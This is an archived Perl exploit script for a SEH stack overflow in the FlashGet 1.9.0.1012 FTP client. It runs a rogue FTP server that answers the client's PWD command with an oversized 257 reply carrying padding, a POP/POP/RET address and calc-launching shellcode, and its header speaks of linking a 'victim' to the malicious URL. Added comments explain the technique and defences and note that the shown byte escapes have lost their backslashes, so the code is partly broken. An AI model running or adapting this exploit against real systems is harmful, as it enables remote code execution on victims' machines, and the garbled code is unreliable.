
# Title : FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Published : 2008-08-15
# Author : SkOd


#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.

##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240

##
# special thanks to a friend of mine who helped me

use IO::Socket;

####################################[ Parameters ]########################################
# ---- Payload and listener parameters -------------------------------------------------
#
# NOTE(review): throughout this archived listing the byte-escape sequences have lost
# their backslashes (they appear as "x31xc9..." rather than hex escapes), so the string
# literals as shown are plain ASCII text and not the bytes the author's comments
# describe.  Do not build a detection signature from the literal text on this page.
#
# $SHELLCODE: per the author's trailing comment, a Metasploit win32_exec stub
# (CMD=calc, 160 bytes, PexFnstenvSub encoder, EXITFUNC=seh) - a proof-of-concept
# that launches calc.exe.  Nothing in this file checks or alters its contents.
my $SHELLCODE =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".
"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".
"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".
"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".
"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".
"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".
"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".
"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".
"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".
"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# Address the rogue FTP server below binds to.  FlashGet has to connect *to* this host
# for the overflow to trigger (the header comment describes the author's scenario), so
# the vulnerable parser lives in the FTP client.  Defensive consequences: the fix is
# patching/replacing the client and restricting FTP egress to trusted servers; the only
# victim-side network indicator is an outbound FTP session to an untrusted host whose
# 257 reply is far longer than any real pathname.
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################


######################################[Defines]#############################################
# ---- Layout of the overflowing 257 reply, from the author's constants ----------------
#   324 x "A"          filler up to the SEH record on the stack
#   4-byte next-SEH    author's comment: a short JMP over the handler pointer
#   4-byte handler     0x1001198B in FGBTCORE.dll, a POP/POP/RET gadget (author's disassembly)
#   $SHELLCODE         from the parameters section
#   300 x NOP          sled; the author notes the exception fires after the stack is overrun
#
# Defensive reading: this is a textbook SEH-overwrite.  It depends on the handler address
# coming from a module that was not linked with /SAFESEH; SafeSEH on every loaded module,
# DEP, and SEHOP (available on later Windows releases) each break this technique.  On the
# wire, an FTP 257 reply of roughly 800 bytes dominated by a single repeated byte followed
# by a NOP run is a reliable indicator - RFC 959 pathname replies are a few dozen bytes.
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;

# The CPU will first dispatch to the next-SEH slot, so the author places a jump there and
# makes the pointer an invalid address so it is treated as the last record in the chain.
my $NEXT_SEH_IN_CHAIN = "xEBx06xFFxFF"; # JMP +6

# Overwritten handler pointer (the "return address" of the SEH technique).
my $CUR_SEH_ADDRESS = "x8Bx19x01x10"; 
# Chosen Ret Addr is : 0x1001198B FlashGetFGBTCORE.dll v1.0. 0.36
# 1001198B   5E               POP ESI
# 1001198C   5B               POP EBX
# 1001198D   C3               RETN

# Building SEH Block (next-SEH pointer first, then the handler pointer - stack order).
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN . 
				$CUR_SEH_ADDRESS;

# Creating Payload.  Note $PAYLOAD (and $LISTEN_PORT below) are assigned without `my`;
# the script has no `use strict`, so both are package globals shared with the server loop.
$PAYLOAD  = $PADDING_CHAR x $PADDING_SIZE;		
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "x90" x 300;	# A lot of NOPs, so that the exception raised once the stack is
							# overrun lands in (and slides into) the author's code.

# Standard FTP control port, so the victim client needs no special URL port.
$LISTEN_PORT = 21;
##########################################################################
# ---- Minimal fake FTP server ---------------------------------------------------------
# Speaks just enough FTP to get a client past login (220 banner, 331 after USER, 230 after
# PASS) and then answers the *next* command - the client's PWD in the author's scenario -
# with a 257 reply whose quoted "pathname" is $PAYLOAD.  The overflow therefore happens in
# the client's handling of that reply, not anywhere on this server.
#
# Style notes: `new IO::Socket::INET (...)` is indirect-object syntax (Class->new is the
# idiom), the handle/flag variables below are undeclared globals (no `use strict`), and
# neither socket creation nor any send/recv result is checked.
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploitrn";
print "# Coded By SkOd, skod.ukx40gmailx2ecomrn";

# Listening socket on $HOST:$LISTEN_PORT; undef if the bind fails (e.g. port 21 needs
# privileges), which the script does not check before calling accept() on it.
my $serverSocket = new IO::Socket::INET (Listen => 1,
					LocalAddr => $HOST,
					LocalPort => $LISTEN_PORT,
					Proto     => 'tcp');	
do
{
	print "rn[~] listening...rn";
	# Blocking accept: clients are served strictly one at a time.
	$clientSocket = $serverSocket->accept();
	print "[+] New Connection Recivedrn";

	$clientSocket->send("220 WELCOME!rn");
	$isPayloadSent = 0;
	
	# Keep answering commands until the 257 reply has gone out once.
	while($isPayloadSent == 0) {
		# Up to 1024 bytes per read, result unchecked: an empty read (client gone) matches
		# neither regex below and falls into the else branch like any other command.
		$clientSocket->recv($recvBuffer,1024);
			print "[~] Recived: " . $recvBuffer;
	
		# Unanchored substring matches, so "USER"/"PASS" anywhere in the buffer qualifies.
		if($recvBuffer =~ /USER/) {
			$clientSocket->send("331 Password required for l33trn");
		} elsif($recvBuffer =~ /PASS/) {
			$clientSocket->send("230 User l33t logged in.rn");
		} else {
			# 257 <quoted pathname> is the RFC 959 PWD reply format; as archived the quoting
			# on this line does not parse.
			$clientSocket->send("257 "$PAYLOAD"rn");
			print("[+] The payload has been sent...rn");
			$isPayloadSent = 1;
		}
	}
	
	$clientSocket->close();
	
# `true` is a bareword here (no strict, no builtin import), i.e. the string "true",
# which is truthy - the server loops forever until killed.
} while (true);
